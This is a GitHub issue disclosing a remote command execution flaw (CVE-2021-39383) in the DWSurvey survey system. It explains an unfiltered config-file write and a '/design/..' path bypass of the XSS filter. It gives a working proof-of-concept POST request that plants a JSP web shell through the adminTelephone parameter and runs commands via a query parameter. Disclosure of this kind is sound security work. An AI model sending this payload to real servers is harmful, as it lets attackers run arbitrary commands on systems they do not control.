CVE-2021-39383: There is a remote command execution vulnerability · Issue #81 · wkeyuan/DWSurvey

The save method in the com/key/dwsurvey/action/sysuser/SysPropertyAction.java file directly accepts the parameters passed from the client and writes them into the specified configuration file, which is directly included in login.jsp, resulting in rce

A file write operation was performed on the specified file in the writeData method

In the save method, the writeData method is invoked to write the admin-info.jsp, and the adminInfo variable comes from the assignment at the beginning of the Sava method.



The xssEncode method of the XssHttpWrapper class filters the request parameters by judging whether the URI contains'/design'

You can see that it is mainly Chinese substitution for special characters

Since it is determined whether to call the filter function by judging whether the URI contains ’/design’, it can be bypassed by adding /design/.. in front of the path
Finally, it is found in login.jsp that the file is included

Poc:

POST /design/../diaowen/sy/system/sys-property!save.action HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=0AA5C18932951B566BBAC5514EA7752C
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

adminTelephone=%3c%25Runtime.getRuntime().exec(request.getParameter("i"));%25%3e&adminEmail=dfsdds&adminTelephone=dsfsdfs

visit http://localhost:8888/diaowen/?i=calc , success rce: